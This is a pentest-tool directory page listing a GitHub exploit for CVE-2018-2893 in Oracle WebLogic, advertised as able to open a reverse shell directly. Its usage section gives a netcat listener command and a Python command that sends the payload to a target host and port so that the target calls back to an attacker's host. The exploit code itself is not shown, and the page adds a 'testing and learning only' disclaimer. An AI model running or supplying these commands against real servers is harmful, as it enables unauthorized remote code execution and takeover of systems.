Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-2893 — 可以直接反弹shell | Kitploit
Tools/GitHubGitHub/qianl0ng/cve-2018-2893
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubqianl0ng/cve-2018-2893

CVE-2018-2893

可以直接反弹shell

View Repository
46143 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2018-2893

Can directly bounce a reverse shell

Usage

Listen

root@kitploit:~
nc -lvvp reverse_port

Send payload

root@kitploit:~
python weblogic.py target_host target_port reverse_host reverse_port

Reference bigsizeme pyn3rd

Note

For testing and learning purposes only, do not use for other purposes

Download Tool